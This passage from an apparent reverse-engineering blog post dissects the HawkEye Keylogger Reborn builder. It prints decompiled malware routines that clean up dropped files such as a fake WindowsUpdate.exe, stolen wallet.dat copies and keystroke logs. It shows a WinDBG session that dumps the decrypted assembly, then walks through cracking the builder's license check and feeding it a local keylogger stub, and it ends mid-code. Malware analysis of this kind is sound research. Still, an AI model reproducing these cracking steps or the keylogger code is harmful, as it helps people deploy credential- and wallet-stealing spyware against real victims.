                    DirectoryInfo directoryInfo3 = new DirectoryInfo(Path.GetTempPath() + "screens");
                    FileInfo[] files3 = directoryInfo3.GetFiles();
                    for (int k = 0; k < files3.Length; k++)
                    {
                        FileInfo fileInfo3 = files3[k];
                        flag = fileInfo3.Extension.Equals(".jpeg");
                        if (flag)
                        {
                            fileInfo3.Delete();
                        }
                    }
                    Thread.Sleep(3000);
                    flag = Directory.Exists(Path.GetTempPath() + "screens");
                    if (flag)
                    {
                        Directory.Delete(Path.GetTempPath() + "screens");
                    }
                }
                catch (Exception expr_40F)
                {
                    ProjectData.SetProjectError(expr_40F);
                    ProjectData.ClearProjectError();
                }
                this.SelfDestruct();
            }
        }

        public void builderclean()
        {
            try
            {
                bool flag = File.Exists(this.Tempclean + "temp.exe");
                if (flag)
                {
                    File.Delete(this.Tempclean + "temp.exe");
                }
                flag = File.Exists(Application.StartupPath + "\\assemblychange.exe");
                if (flag)
                {
                    File.Delete(Application.StartupPath + "\\assemblychange.exe");
                }
                Thread.Sleep(1000);
                flag = File.Exists(Application.StartupPath + "\\assemblychange.res");
                if (flag)
                {
                    File.Delete(Application.StartupPath + "\\assemblychange.res");
                }
                flag = File.Exists(Application.StartupPath + "\\ResHacker.exe");
                if (flag)
                {
                    File.Delete(Application.StartupPath + "\\ResHacker.exe");
                }
                Thread.Sleep(1000);
                flag = File.Exists(Application.StartupPath + "\\ResHacker.ini");
                if (flag)
                {
                    File.Delete(Application.StartupPath + "\\ResHacker.ini");
                }
                flag = File.Exists(Application.StartupPath + "\\ResHacker.log");
                if (flag)
                {
                    File.Delete(Application.StartupPath + "\\ResHacker.log");
                }
            }
            catch (Exception expr_12A)
            {
                ProjectData.SetProjectError(expr_12A);
                ProjectData.ClearProjectError();
            }
        }

        public void serverclean()
        {
            try
            {
                bool flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\WindowsUpdate.exe");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\WindowsUpdate.exe");
                }
                flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\WindowsUpdate.exe");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\WindowsUpdate.exe");
                }
                flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Windows Update.exe");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Windows Update.exe");
                }
                flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Pin.exe");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Pin.exe");
                }
                Thread.Sleep(1000);
                flag = File.Exists(Path.GetTempPath() + "SysInfo.txt");
                if (flag)
                {
                    File.Delete(Path.GetTempPath() + "SysInfo.txt");
                }
                flag = File.Exists(this.Tempclean + "wallet.dat");
                if (flag)
                {
                    File.Delete(this.Tempclean + "wallet.dat");
                }
                flag = File.Exists(this.Tempclean + MyProject.Computer.Name + "_wallet.dat");
                if (flag)
                {
                    File.Delete(this.Tempclean + MyProject.Computer.Name + "_wallet.dat");
                }
                flag = File.Exists(this.Tempclean + "firstfile.exe");
                if (flag)
                {
                    File.Delete(this.Tempclean + "firstfile.exe");
                }
                Thread.Sleep(1000);
                flag = File.Exists(this.Tempclean + "firstfile.txt");
                if (flag)
                {
                    File.Delete(this.Tempclean + "firstfile.txt");
                }
                flag = File.Exists(this.Tempclean + "secondfile.exe");
                if (flag)
                {
                    File.Delete(this.Tempclean + "secondfile.exe");
                }
                flag = File.Exists(this.Tempclean + "secondfile.txt");
                if (flag)
                {
                    File.Delete(this.Tempclean + "secondfile.txt");
                }
                Thread.Sleep(1000);
                flag = File.Exists(Path.GetTempPath() + "CLog.txt");
                if (flag)
                {
                    File.Delete(Path.GetTempPath() + "CLog.txt");
                }
                flag = File.Exists(this.Tempclean + "holdermail.txt");
                if (flag)
                {
                    File.Delete(this.Tempclean + "holdermail.txt");
                }
                flag = File.Exists(this.Tempclean + "holderwb.txt");
                if (flag)
                {
                    File.Delete(this.Tempclean + "holderwb.txt");
                }
            }
            catch (Exception expr_2CD)
            {
                ProjectData.SetProjectError(expr_2CD);
                ProjectData.ClearProjectError();
            }
        }

Other interesting file was ‘License.dll’. I loaded it in ILSpy and got the following message:

So it seems ‘SmartAssembly 6.9.0.114 obfuscator’ was used, at least in some PE files that are part of the whole package. However, even after cleaning it I couldn’t make much sense of the code… The amount of goto’s indicates that the file is still obfuscated, so or either SmartAssembly was incorrectly detected or the deobfuscator didn’t work. I didn’t spend much time with this though.

One of the dumped ‘HawkEye Keylogger – Reborn.exe’ files was smaller than the original, however after loading it in ILSpy I could see it was still packed/encrypted and all his functionality appeared the same. By running it I was again stuck in the ‘Net Seal’ login prompt.

It is interesting to notice that if this file was using some evasion techniques it would have exited long before we have finished. So this behaviour led me to conclude that if this ‘HawkEye’ version was using evasion techniques they were most likely not implemented correctly.

WinDBG to the rescue

In order to debug .net assemblies the best option is WinDBG with SOS and SOSEX together. However there is no IL code steping and it might be a bit hard to get into it. The IL opcodes are a bit scary, at least at first. Besides reversing .net malware is not well documented on the internet.

Before you start make sure you load Microsoft debugging symbols. Set your symbol path to Microsoft symbol server or just download the symbols locally. I usually have the symbols installed locally for obvious reasons, but it is completely up to you. I’m not going to show how to do it since this is widely documented. However this step is not optional.

The SOS extension is part of the .net framework and the SOSEX extension can be downloaded from here. You can install it anywhere you want, after firing WinDBG you need to load it the following way:

1

.load "F:\\sosex_32\\sosex.dll"

I’ll skip the steps to load and use SOS because you can do everything with SOSEX. However in a initial phase it was quite useful to get a better insight of this .net assembly.

As I mentioned before, one of the things I noticed when I first looked at the .net assembly in ILSpy was the use of Reflection and LoadModule. This method loads a Byte Array, hopefully unecrypted/deofuscated I thought. So with the help of SOSEX is quite easy to set a breakpoint on any method matching a pattern. So I decided to set a breakpoint on any method matching the pattern Assembly.Load:

1

!mbm *Assembly.Load*

When we run the binary CLR is initialized and WinDBG places breakpoints on all methods matching the pattern above. After the first breakpoint is hit you can see a complete list of breakpoints with:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

0:000> bl
 0 e 71f37591     0001 (0001)  0:**** mscorlib_ni+0x327591
 1 e 71f0cb45     0001 (0001)  0:**** mscorlib_ni+0x2fcb45
 3 e 72647e69     0001 (0001)  0:**** mscorlib_ni+0xa37e69
 4 e 72647e95     0001 (0001)  0:**** mscorlib_ni+0xa37e95
 5 e 71f357d1     0001 (0001)  0:**** mscorlib_ni+0x3257d1
 6 e 72647f0d     0001 (0001)  0:**** mscorlib_ni+0xa37f0d
 7 e 71fa6009     0001 (0001)  0:**** mscorlib_ni+0x396009
 8 e 71f0cb6d     0001 (0001)  0:**** mscorlib_ni+0x2fcb6d
 9 e 72647f31     0001 (0001)  0:**** mscorlib_ni+0xa37f31
10 e 72647f70     0001 (0001)  0:**** mscorlib_ni+0xa37f70
11 e 72647fac     0001 (0001)  0:**** mscorlib_ni+0xa37fac
12 e 7264800f     0001 (0001)  0:**** mscorlib_ni+0xa3800f
13 e 72648047     0001 (0001)  0:**** mscorlib_ni+0xa38047
14 e 726480a5     0001 (0001)  0:**** mscorlib_ni+0xa380a5
15 e 72648122     0001 (0001)  0:**** mscorlib_ni+0xa38122
16 e 72648175     0001 (0001)  0:**** mscorlib_ni+0xa38175
17 e 726485a9     0001 (0001)  0:**** mscorlib_ni+0xa385a9
18 e 726485c1     0001 (0001)  0:**** mscorlib_ni+0xa385c1
19 e 72648b1c     0001 (0001)  0:**** mscorlib_ni+0xa38b1c
20 e 72648bda     0001 (0001)  0:**** mscorlib_ni+0xa38bda
21 e 71f5f9c7     0001 (0001)  0:**** mscorlib_ni+0x34f9c7
23 e 72648de1     0001 (0001)  0:**** mscorlib_ni+0xa38de1

After some hits and some exceptions we land exactly where we want.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

0:000> g
ModLoad: 70ec0000 70ed3000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
Breakpoint 11 hit
eax=00000000 ebx=021d447c ecx=0fbc1030 edx=003e0400 esi=0fbc1030 edi=021c3f8c
eip=72647fac esp=0034ee2c ebp=0034ee34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
mscorlib_ni+0xa37fac:
72647fac e883c5fdff      call    mscorlib_ni+0xa14534 (72624534)
0:000> dd ecx
0fbc1030  72052518 003e0400 00905a4d 00000003
0fbc1040  00000004 0000ffff 000000b8 00000000
0fbc1050  00000040 00000000 00000000 00000000
0fbc1060  00000000 00000000 00000000 00000000
0fbc1070  00000000 00000080 0eba1f0e cd09b400
0fbc1080  4c01b821 685421cd 70207369 72676f72
0fbc1090  63206d61 6f6e6e61 65622074 6e757220
0fbc10a0  206e6920 20534f44 65646f6d 0a0d0d2e

If we check ECX register we should have our Byte Array ready to be dumped. The second DWORD (003e0400) corresponds to size of the Byte Array and the third DWORD (00905a4d) corresponds to the .net assembly. To dump this assembly we can use the ‘writemem’ command as follows:

1

.writemem F:\sample.decrypted.exe 00905a4d L? 003e0400

But there’s an easier and 1337 way by using the poi() function. Pointer of integer function is used to get pointer-sized data. Think about the * operator for C and C++. By using poi() we just provide ecx+4 as its parameter and it will automatically take the value at that address and use it, rather than just using the value of ecx+4:

1

.writemem F:\sample.decrypted.exe @ecx+8 L?poi(@ecx+4)

I loaded the assembly in ILSpy and Bingo.

I now have access to the whole code. Under ‘Keylogger’ we can find the code for the ‘Builder’ of the samples that have been collected on the wild. As we can see, by looking only at the methods, the ‘Builder’ has loads of ‘cool’ stuff. ‘NewsFeed’, ‘Tutorial’, ‘BugReport’, ‘Bazaar’… it almost looks like a legit software.

After running the new binary I’m still stuck at the ‘Net Seal’ prompt login though. But now I have access to the code!

In case you missed something here’s the full WinDBG session.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213

CommandLine: "C:\Users\rui\Desktop\HawkEyeKeyloggerReborn\HawkEye Keylogger - Reborn\HawkEye Keylogger - Reborn.exe"

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*F:\symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*F:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: srv*
ModLoad: 00a40000 00b72000   image00a40000
ModLoad: 77240000 773c0000   ntdll.dll
ModLoad: 735b0000 735fa000   C:\Windows\SysWOW64\MSCOREE.DLL
ModLoad: 75240000 75350000   C:\Windows\syswow64\KERNEL32.dll
ModLoad: 76d20000 76d67000   C:\Windows\syswow64\KERNELBASE.dll
(9a8.c94): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=08960000 edx=0017dda8 esi=fffffffe edi=00000000
eip=772e103b esp=0034f8c8 ebp=0034f8f4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
772e103b cc              int     3
0:000> .load "F:\\sosex_32\\sosex.dll"
0:000> !mbm *Assembly.Load*
The CLR has not yet been initialized in the process.
Breakpoint resolution will be attempted when the CLR is initialized.
0:000> g
ModLoad: 76b70000 76c10000   C:\Windows\syswow64\ADVAPI32.dll
ModLoad: 764d0000 7657c000   C:\Windows\syswow64\msvcrt.dll
ModLoad: 767f0000 76809000   C:\Windows\SysWOW64\sechost.dll
ModLoad: 76820000 76910000   C:\Windows\syswow64\RPCRT4.dll
ModLoad: 74bd0000 74c30000   C:\Windows\syswow64\SspiCli.dll
ModLoad: 74bc0000 74bcc000   C:\Windows\syswow64\CRYPTBASE.dll
ModLoad: 73530000 735a9000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 761e0000 76237000   C:\Windows\syswow64\SHLWAPI.dll
ModLoad: 76ad0000 76b60000   C:\Windows\syswow64\GDI32.dll
ModLoad: 76940000 76a40000   C:\Windows\syswow64\USER32.dll
ModLoad: 767d0000 767da000   C:\Windows\syswow64\LPK.dll
ModLoad: 76580000 7661d000   C:\Windows\syswow64\USP10.dll
ModLoad: 76a70000 76ad0000   C:\Windows\SysWOW64\IMM32.DLL
ModLoad: 76d70000 76e3c000   C:\Windows\syswow64\MSCTF.dll
ModLoad: 73520000 73529000   C:\Windows\SysWOW64\VERSION.dll
ModLoad: 72e60000 73511000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
ModLoad: 72d60000 72e55000   C:\Windows\SysWOW64\MSVCR120_CLR0400.dll
(9a8.c94): Unknown exception - code 04242420 (first chance)
ModLoad: 71c10000 72d5a000   C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
Breakpoint set at System.Reflection.Assembly.LoadFrom(System.String) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadFrom(System.String, System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadFrom(System.String, System.Security.Policy.Evidence, Byte[], System.Configuration.Assemblies.AssemblyHashAlgorithm) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadFrom(System.String, Byte[], System.Configuration.Assemblies.AssemblyHashAlgorithm) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(System.String) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(System.String, System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(System.Reflection.AssemblyName) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(System.Reflection.AssemblyName, System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadWithPartialName(System.String) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadWithPartialName(System.String, System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(Byte[]) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(Byte[], Byte[]) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.SecurityContextSource) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.Load(Byte[], Byte[], System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadFile(System.String) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadFile(System.String, System.Security.Policy.Evidence) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadModule(System.String, Byte[]) in AppDomain 00368190.
Breakpoint set at System.Reflection.Assembly.LoadModule(System.String, Byte[], Byte[]) in AppDomain 00368190.
Breakpoint set at System.Reflection.RuntimeAssembly.LoadWithPartialNameHack(System.String, Boolean) in AppDomain 00368190.
Breakpoint set at System.Reflection.RuntimeAssembly.LoadWithPartialNameInternal(System.String, System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef) in AppDomain 00368190.
Breakpoint set at System.Reflection.RuntimeAssembly.LoadWithPartialNameInternal(System.Reflection.AssemblyName, System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef) in AppDomain 00368190.
Breakpoint set at System.Reflection.RuntimeAssembly.LoadModule(System.String, Byte[], Byte[]) in AppDomain 00368190.
ModLoad: 74f60000 750bc000   C:\Windows\syswow64\ole32.dll
ModLoad: 70490000 70510000   C:\Windows\SysWOW64\uxtheme.dll
ModLoad: 71b30000 71bae000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
ModLoad: 76010000 7609f000   C:\Windows\syswow64\OLEAUT32.dll
*** WARNING: Unable to verify checksum for C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
Breakpoint 23 hit
eax=ffffff00 ebx=00000000 ecx=00368190 edx=0034f280 esi=021a3084 edi=021a23d0
eip=72648de1 esp=0034f27c ebp=0034f290 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
mscorlib_ni+0xa38de1:
72648de1 33d2            xor     edx,edx
0:000> bl
 0 e 71f37591     0001 (0001)  0:**** mscorlib_ni+0x327591
 1 e 71f0cb45     0001 (0001)  0:**** mscorlib_ni+0x2fcb45
 3 e 72647e69     0001 (0001)  0:**** mscorlib_ni+0xa37e69
 4 e 72647e95     0001 (0001)  0:**** mscorlib_ni+0xa37e95
 5 e 71f357d1     0001 (0001)  0:**** mscorlib_ni+0x3257d1
 6 e 72647f0d     0001 (0001)  0:**** mscorlib_ni+0xa37f0d
 7 e 71fa6009     0001 (0001)  0:**** mscorlib_ni+0x396009
 8 e 71f0cb6d     0001 (0001)  0:**** mscorlib_ni+0x2fcb6d
 9 e 72647f31     0001 (0001)  0:**** mscorlib_ni+0xa37f31
10 e 72647f70     0001 (0001)  0:**** mscorlib_ni+0xa37f70
11 e 72647fac     0001 (0001)  0:**** mscorlib_ni+0xa37fac
12 e 7264800f     0001 (0001)  0:**** mscorlib_ni+0xa3800f
13 e 72648047     0001 (0001)  0:**** mscorlib_ni+0xa38047
14 e 726480a5     0001 (0001)  0:**** mscorlib_ni+0xa380a5
15 e 72648122     0001 (0001)  0:**** mscorlib_ni+0xa38122
16 e 72648175     0001 (0001)  0:**** mscorlib_ni+0xa38175
17 e 726485a9     0001 (0001)  0:**** mscorlib_ni+0xa385a9
18 e 726485c1     0001 (0001)  0:**** mscorlib_ni+0xa385c1
19 e 72648b1c     0001 (0001)  0:**** mscorlib_ni+0xa38b1c
20 e 72648bda     0001 (0001)  0:**** mscorlib_ni+0xa38bda
21 e 71f5f9c7     0001 (0001)  0:**** mscorlib_ni+0x34f9c7
23 e 72648de1     0001 (0001)  0:**** mscorlib_ni+0xa38de1
0:000> dd ecx
00368190  72e63014 00000001 00368190 001f3f7c
003681a0  00000010 00000000 00000000 00369150
003681b0  00000000 00000000 00000000 baadf000
003681c0  00368fa0 ffffffff 00000000 00000000
003681d0  00000000 00000000 c0000020 00000001
003681e0  00000001 00000000 00368e88 ffffffff
003681f0  00000000 00000000 00000000 00000000
00368200  c0000000 00368ec0 ffffffff 00000000
0:000> g
ModLoad: 711a0000 71b27000   C:\Windows\assembly\NativeImages_v4.0.30319_32\System\52cca48930e580e3189eac47158c20be\System.ni.dll
(9a8.c94): CLR exception - code e0434352 (first chance)
Breakpoint 11 hit
eax=00000000 ebx=0034e5b0 ecx=021b9924 edx=00000025 esi=021b9924 edi=021b1a7c
eip=72647fac esp=0034e4a4 ebp=0034e4ac iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
mscorlib_ni+0xa37fac:
72647fac e883c5fdff      call    mscorlib_ni+0xa14534 (72624534)
0:000> dd ecx
021b9924  72052518 00000800 00905a4d 00000003
021b9934  00000004 0000ffff 000000b8 00000000
021b9944  00000040 00000000 00000000 00000000
021b9954  00000000 00000000 00000000 00000000
021b9964  00000000 00000080 0eba1f0e cd09b400
021b9974  4c01b821 685421cd 70207369 72676f72
021b9984  63206d61 6f6e6e61 65622074 6e757220
021b9994  206e6920 20534f44 65646f6d 0a0d0d2e
0:000> g
(9a8.c94): CLR exception - code e0434352 (first chance)
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=121a0000 edx=00000005 esi=15cb899f edi=121a0000
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:121a000c=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=0b06799c edx=00000005 esi=15cb899f edi=0b06799c
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:0b0679a8=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=00004e20 edx=00000005 esi=15cb899f edi=00004e20
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:00004e2c=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=00001000 edx=00000005 esi=15cb899f edi=00001000
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:0000100c=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=0000002c edx=00000005 esi=15cb899f edi=0000002c
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:00000038=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=00000008 edx=00000005 esi=15cb899f edi=00000008
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:00000014=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=00000008 edx=00000005 esi=15cb899f edi=00000008
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:00000014=????????
0:000> g
(9a8.c94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000c ebx=00000000 ecx=0000000c edx=00000005 esi=15cb899f edi=0000000c
eip=0045cd2b esp=0034e478 ebp=0034e4c0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0045cd2b 8b0407          mov     eax,dword ptr [edi+eax] ds:002b:00000018=????????
0:000> g
ModLoad: 70ec0000 70ed3000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
Breakpoint 11 hit
eax=00000000 ebx=021d447c ecx=0fbc1030 edx=003e0400 esi=0fbc1030 edi=021c3f8c
eip=72647fac esp=0034ee2c ebp=0034ee34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
mscorlib_ni+0xa37fac:
72647fac e883c5fdff      call    mscorlib_ni+0xa14534 (72624534)
0:000> dd ecx
0fbc1030  72052518 003e0400 00905a4d 00000003
0fbc1040  00000004 0000ffff 000000b8 00000000
0fbc1050  00000040 00000000 00000000 00000000
0fbc1060  00000000 00000000 00000000 00000000
0fbc1070  00000000 00000080 0eba1f0e cd09b400
0fbc1080  4c01b821 685421cd 70207369 72676f72
0fbc1090  63206d61 6f6e6e61 65622074 6e757220
0fbc10a0  206e6920 20534f44 65646f6d 0a0d0d2e
0:000> .writemem f:\sample.decrypted.exe @ecx+8 L?poi(@ecx+4)
Writing 3e0400 bytes............................

Cracking HawkEye Keylogger Reborn

So I need to bypass this login prompt which I guess it validates the license. Which options do I have? I can try to export the code and build it on Visual Studio…

Well, I tried… 738 errors! Good luck with that…

The only option is to patch the binary. Even though I’ll be dealing with IL code and not assembly code… it looks more fun than fix 738 build errors. Luckily there’s a really nice plugin for ILSpy and Reflector called Reflexil that allows you to binary patch the IL code “easily”.

I used ILSpy since it is free. I tried Reflector too but I couldn’t find any feature worth the 59£. So stick with ILSpy. After poking around the code for a while I’ve found an interesting method inside the class ‘License’ called ‘Initialize()’. It seems I’ll need to modify it.

There are two ways you can modify the code with Reflexil. An easy one and a hard one. The easy one allows you to modify directly the code in C# (or Visual Basic). The hard one allows you to modify directly the IL opcodes.

Of course I went for the easy way! But that didn’t work quite well…

It looks I’ll have to learn some IL code. I have tried to build some really small PoCs on Visual Studio to figure out the IL opcodes for simple things like:

1

return true;

Which is basically:

1
2

ldc.i4.1
ret

However Reflexil makes it really easy, after poking around the code for a little while it looked like I only needed to delete instructions and not actually write any IL code.

So I deleted all the IL instructions from the methods ‘Initialize()’ and ‘Initialize(string)’ and saved the new file.

I’ve run it and… voila. Cracked?

Well… kind of. Because, if you try to use the ‘builder’… it does’t work.

The newest version of ‘HawkEye Keylogger’ has one big difference to the older ones that makes it a bit harder to crack. While the other cracked versions of ‘HawkEye Keylogger’ that I could find on-line (I mean the ones that work, because some don’t…) have the actual keylogger embedded as a Resource. However this ‘Reborn’ version doesn’t have the keylogger binary embedded as a Resource any more. Instead, during runtime the keylogger executable is downloaded from ‘https://seal.nimoru.com/Base/getFile.php’. The author’s intention is clearly avoid cracking. Look at the following ‘builder’ code under the ‘Menu’ class.

As we can see the download of the file depends on code from the ‘Net Seal’ authentication mechanism that we bypassed since we don’t have an account. Anyway we can see what’s going on here by looking at the ‘Cloud’ method.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

public byte[] Cloud(string Url)
{
    byte[] result;
    try
    {
        result = this.Decompress(Convert.FromBase64String(Url));
        return result;
    }
    catch (Exception expr_13)
    {
        ProjectData.SetProjectError(expr_13);
        ProjectData.ClearProjectError();
    }
    result = new byte[0];
    return result;
}

I started looking around the code again to see what I could do. I though the easiest way was using a local sample of the keylogger and read its bytes directly into ‘MyProject.Forms.Keylogger.stubBytes’. To do this I need to find a proper place and write some IL code. It seems I can’t go away without writing IL code. Fun.

I used the same approach as before, launched Visual Studio and wrote more or less what I needed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

using System;
using System.IO;

namespace StubTest
{
    class Program
    {
        static void Main(string[] args)
        {
            string path = @"f:\stub.exe";
            byte[] byteArray = File.ReadAllBytes(path);
        }
    }
}

Then I loaded it on ILSpy and looked at the IL instructions.

Then I started looking at the IL instructions of ‘GetStub’ method from the ‘Menu’ class…

I’ve found what it looked like a possible place for my IL code at ‘Menu_Load’ method on the ‘Menu’ class and rewrote it as shown bellow:

Saved the new file and gave it a try…

Yes, now it works. You need to place the ‘keylogger’ sample on ‘C:\pwned.exe’, you can change it but I’ll leave that as an exercise for you. Note that you also need ‘Mono.Cecil.dll’ installed on your system or simply on the same directory as our final cracked version or the program will crash with an ‘System.IO.FileNotFoundException’. If you use Procmon you can easily identify what’s missing…

You already have ‘Mono.Cecil.dll’, look at the dumps from ‘MegaDumper’ so… Mission Accomplished!

I’m not sharing the cracked version. However, you can visit the links I mention above and with all the information here you should be able to get the ‘job done’ or even do a better job.

HawkEye Builder Features and Code

The builder presents the user with multiple options. We can contact support via email as shown bellow.

Here’s the code from sending an email and “ask a favour”!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87

private void AskFavour()
        {
            this.Invoke(new VB$AnonymousDelegate_0(delegate
            {
                try
                {
                    this.btnSend.Enabled = false;
                    this.btnSend.Text = "Wait...";
                    this.sBarLabel.Text = "We are submitting your report, please wait...";
                    this.communication = LicenseGlobal.Seal.GetVariable("communication").Split(new char[]
                    {
                        '|'
                    });
                    MailMessage mailMessage = new MailMessage();
                    mailMessage.From = new MailAddress(this.communication[0]);
                    bool flag = Operators.CompareString(this.cboSubject.Text, "Technical Support", false) == 0;
                    if (flag)
                    {
                        string addresses = string.Concat(new string[]
                        {
